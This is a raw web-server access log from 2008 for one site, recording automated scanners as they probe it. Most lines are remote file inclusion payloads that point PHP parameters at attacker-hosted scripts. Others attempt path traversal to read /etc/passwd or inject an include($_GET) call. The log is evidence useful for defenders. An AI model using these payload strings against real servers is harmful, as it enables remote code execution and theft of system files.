74.53.240.146 - - [23/Jul/2008:05:31:48 -0700] "GET /logs/errors.php?error=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:31:49 -0700] "GET /errors.php?error=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
91.198.175.18 - - [23/Jul/2008:05:32:41 -0700] "GET /logs/access_080624.log//templates/mangobery/footer.sample.php?Site_Path=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:32:42 -0700] "GET /errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:32:42 -0700] "GET /logs/access.log/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:32:45 -0700] "GET /logs/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:33:05 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:33:05 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:33:07 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:33:09 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:33:09 -0700] "GET //index.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:33:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:33:50 -0700] "GET /logs/access_080711.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:33:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:33:50 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
24.47.133.61 - - [23/Jul/2008:05:33:54 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://81.169.165.90/indo/iris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
24.47.133.61 - - [23/Jul/2008:05:33:54 -0700] "GET /config.php?path_to_root=http://81.169.165.90/indo/iris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
24.47.133.61 - - [23/Jul/2008:05:33:54 -0700] "GET /logs/config.php?path_to_root=http://81.169.165.90/indo/iris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
24.47.133.61 - - [23/Jul/2008:05:34:36 -0700] "GET /logs/access.log/config.php?path_to_root=http://81.169.165.90/indo/iris.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
190.196.5.189 - - [23/Jul/2008:05:34:49 -0700] "GET /logs/access_080705.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:34:51 -0700] "GET /logs/access_080705.log/phphtml.php?htmlclass_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:34:51 -0700] "GET /phphtml.php?htmlclass_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sickskins.com"
190.196.5.189 - - [23/Jul/2008:05:34:52 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
190.196.5.189 - - [23/Jul/2008:05:34:56 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:38:34 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:39:38 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:39:42 -0700] "GET /logs/access_080711.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:39:42 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:39:54 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
65.38.180.6 - - [23/Jul/2008:05:40:28 -0700] "GET /logs/access_080611.log/errors.php?error=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
80.93.62.112 - - [23/Jul/2008:05:40:49 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.93.62.112 - - [23/Jul/2008:05:40:49 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.93.62.112 - - [23/Jul/2008:05:40:50 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:41:29 -0700] "GET /logs/access_080705.log/phphtml.php?htmlclass_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:41:29 -0700] "GET /phphtml.php?htmlclass_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:41:29 -0700] "GET /logs/phphtml.php?htmlclass_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
209.172.55.178 - - [23/Jul/2008:05:41:30 -0700] "GET /logs/access_080629.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:41:45 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:42:00 -0700] "GET /logs/access_080711.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:42:00 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:42:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:42:04 -0700] "GET /logs/access_080703.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:42:53 -0700] "GET /logs/access_080703.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:42:54 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:42:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:43:02 -0700] "GET /logs/access_080705.log/phphtml.php?htmlclass_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:43:02 -0700] "GET /phphtml.php?htmlclass_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:43:03 -0700] "GET /logs/phphtml.php?htmlclass_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:05:43:06 -0700] "GET /logs/access_080711.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
64.22.85.186 - - [23/Jul/2008:05:43:24 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
64.22.85.186 - - [23/Jul/2008:05:43:24 -0700] "GET /logs/access_080711.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
64.22.85.186 - - [23/Jul/2008:05:43:24 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
88.84.151.157 - - [23/Jul/2008:05:43:26 -0700] "GET /logs/access_080711.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.93.62.112 - - [23/Jul/2008:05:43:26 -0700] "GET /logs/access_080703.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
88.84.151.157 - - [23/Jul/2008:05:43:27 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
88.84.151.157 - - [23/Jul/2008:05:43:27 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
64.22.85.186 - - [23/Jul/2008:05:43:37 -0700] "GET /logs/access_080629.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
203.22.204.188 - - [23/Jul/2008:05:44:18 -0700] "GET /logs/access_080611.log/errors.php?error=http://jelna.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
80.93.62.112 - - [23/Jul/2008:05:45:03 -0700] "GET /logs/access_080711.log//modules/TotalCalendar/about.php?inc_dir=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.93.62.112 - - [23/Jul/2008:05:45:04 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
80.93.62.112 - - [23/Jul/2008:05:45:04 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:05:45:26 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:05:45:26 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:45:37 -0700] "GET /logs/access_080705.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:45:37 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:45:37 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
190.196.5.189 - - [23/Jul/2008:05:45:48 -0700] "GET /logs/access_080705.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
190.196.5.189 - - [23/Jul/2008:05:45:51 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
190.196.5.189 - - [23/Jul/2008:05:45:53 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:46:06 -0700] "GET /logs/access_080629.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:46:06 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:46:06 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:46:18 -0700] "GET /logs/access_080629.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:46:18 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
205.234.130.171 - - [23/Jul/2008:05:46:18 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:05:46:30 -0700] "GET /phphtml.php?htmlclass_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:47:37 -0700] "GET /logs/access_080611.log/errors.php?error=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:47:50 -0700] "GET /logs/access_080611.log/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:48:13 -0700] "GET /logs/access_080611.log//index.php?DOCUMENT_ROOT=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:05:48:16 -0700] "GET /?sourcedir=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
74.53.240.146 - - [23/Jul/2008:05:48:34 -0700] "GET /logs/access_080611.log//index.php?DOCUMENT_ROOT=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:48:35 -0700] "GET /logs/access_080611.log/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:48:35 -0700] "GET /logs/access_080611.log/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
163.17.62.3 - - [23/Jul/2008:05:48:35 -0700] "GET /logs/access_080611.log/errors.php?error=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
218.38.54.160 - - [23/Jul/2008:05:49:48 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:50:35 -0700] "GET /logs/access_080711.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:50:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:50:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.246.77.172 - - [23/Jul/2008:05:50:37 -0700] "GET /logs/access_080703.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
190.196.5.189 - - [23/Jul/2008:05:50:46 -0700] "GET /logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
91.198.175.18 - - [23/Jul/2008:05:51:28 -0700] "GET /scan:/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:07 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:08 -0700] "GET /config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:08 -0700] "GET /logs/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:05:52:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:05:52:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
201.116.50.181 - - [23/Jul/2008:05:52:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:09 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:09 -0700] "GET /config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:09 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:10 -0700] "GET /logs/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:10 -0700] "GET /config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:10 -0700] "GET /logs/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:10 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:11 -0700] "GET /config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:11 -0700] "GET /logs/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:13 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:05:52:14 -0700] "GET /config.php?path_to_root=http://ahack.007gb.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
